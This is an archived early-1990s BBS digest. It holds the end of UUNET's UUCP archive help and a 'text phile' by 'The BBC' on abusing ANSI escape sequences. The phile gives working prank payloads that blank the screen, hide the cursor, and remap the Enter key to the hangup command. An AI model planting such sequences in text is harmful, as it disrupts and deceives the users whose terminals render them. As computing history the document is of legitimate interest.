Modify as appropriate for your site, of course, to deal with your
local telephone system and uucp version.

All modems on the 900 lines are Telebit T2500s. Note that these
modems first answer with V.32, then at 2400, 1200, and last with PEP
tones. This "
900" number charges $.50US per minute to the caller.

2. Where the files are

This file of instructions exists as the file uunet!~/info/archive-help
uunet!~/ls-lR.Z contains a list of all files available. This is the
compressed output of an `ls -lR' command. This file is updated each
night. (Note this file is currently about 520 Kbytes *compressed*).
Information on other indexes can be found in uunet!~/index/README.
The file uunet!~/info/layout details the basic organization of the
archive.

3. File formats

Files with .Z endings are compressed. The uncompress program is
available in uunet!~/compress.tar if you don't have it.

Some very large files have been split into several files for you.
This are usually evidenced by sequenced endings after a .Z ending.
eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39
After you obtain all of the parts you need only concatenate them
in the proper order.
eg: cat 18.57.Z.* > emacs-18.57.Z

UUCP File Transfer Tips

You must write files you transfer to a directory which the user
"
uucp" has write access. That user, not you, will actually do the
transfer. /usr/spool/uucppublic is the common place used.

You may see different pathnames for files in an archive which
equate to the same thing. For example an archive that is /usr/spool/ftp
(aka ~ftp), might also accessible as /usr/spool/uucppublic (aka
~uucp, or just ~ for UUCP).

Be sure you use absolute pathnames when specifying remote filename.
If you don't, your working directory will be prepended to the
pathname in the command. uunet!file and uunet!~/file are different.
uunet!~/ is the best reference to the base of the archive via uucp.

Permission denied messages normally indicate a file name or
file access problem. Be sure to have the latest copy of the file
list.

Beware when using shell meta-characters in transfers. You need to
escape them in most circumstances (eg: the ! in csh). Also note
that there are a number of UUCP implementations which do not handle
multi-file transfers correctly. If you pass a * to the remote
system you may get 'access denied' messages. These indicate a UUCP
problem, not a file problem.

OTHER RESOURCES

In addition to the resources already mentioned, there are several
books which discuss USENET and/or UUCP maintenance. They include:

Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2
Date: 1990. Pages: 210. Cost: $24.95

Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95

Both are "
Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut
Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts

Unix Communications; Bart Anderson, Barry Costales, and Harry
Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
Pages: 736. Cost: $29.95.

Covers everything the end user needs to know about email, USENET and UUCP.

------------------------------------------------------------------------------
------------------
| Article 8 of 8 |
------------------

To: hackers@tsf.UUCP
Subject: Text phile 3.
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

Welcome, Kiddies... To another jam packed fun day at... The BBC's
crash house... Todays secret word is 'ANSI'... Yes after this lesson
when ever a sysop/user hears the word 'ANSI', They will scream real
loud!!!

First lets ask our friend Crashy a question... Crashy, do you
use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have
the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???
'Well... Yes, I guess'... Good, See kiddies every one uses it but
few understand it... An that is how we will play with the users
of a bbs's mind as well as the sysops [usually not much of one here]...

First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method
of controlling IO on remote systems... It uses escape sequences to
do every thing from moving the cursor around and changing color of
the text to redefining the keyboard keys... A very useful tool for
helping computer users and making nice displays.. An a cheep shot
as far as hacking games go... But that never stoped us before... For
what if some devious minds where to put them to use??? An we are just
the ones to do it... Also for those who don't know, [ESC] stands for
the escape char. [0x1b] or to type it in remote hold down the ALT key
while typing 27 on the numeric key pad then release the ALT key...

Lets start with a classic... We all know to change the text color
you use the sequence 'ESC[<color>;<color>;...<color>m' and it will
change the color for all following text till it is used again... Well
what if one uses the command 'ESC[0;8m'... This would cause the ANSI
[AAAAHHHHH] driver to reset the color to default then set the screen
to black text on a black background... What a glorious sight (or lack
of there) when the computer just seems to stop... No text no
nothing... An if they don't reset it, well.... All the boards they
call afterwards will do the same...

Or how about this one... 'ESC[=0h;=7l'... All it does is set the
screen to 40 column mode and turns line wrapping off... So there eyes
get a rest... only half the calories of a regular screen and in
larger portions...

Then there is the story of the farmer's 'ESC[26;0H'... Moving the
cursor off the screen and making them wait for the next prompt (if
this command is at the end of a message) that seams to never come...
But you should not tell this joke in polite company...

An of course we saved the best for last... The ol' Two Face key
change... Just use the command 'ESC[<From key>;<To key>p' and wha-la
instant chaos... For example 'ESC[13;0;35p', next time the [ENTER]
key is hit it changes into a ALT-H (The hangup command for most
term packages... An we would hope you would not use this to just
redefine the whole keyboard so that what they type is not what
they get!!! That would be.... bad... An you are not a bunch of
bad boys and girls are you... We thought so...

So boys and girls... Its time to go... and remember...
The night belongs to the hackers... The early hacker gets to DOS...
A virus in the system is worth 2 trojans in the bush... Ect.. Ect..
Ect..

'Another fine mess' from your friends at...
The BBC

----------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
-=[ "
Anarchy is never HAVING to say you're sorry." ]=-

------------------------------------------------------------------------------
That's all folks...keep that e-mail coming!
------------------------------------------------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-= Max Cray =-
Internet: underg!max@uunet.uu.net Support
UUCP: ...!uunet!idsvax!underg!max Free
Data: The Underground Computing Foundation BBS Software
401-847-2603 -=- 9600 baud (v.32) (w/src)
CI$: 76334,2203



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT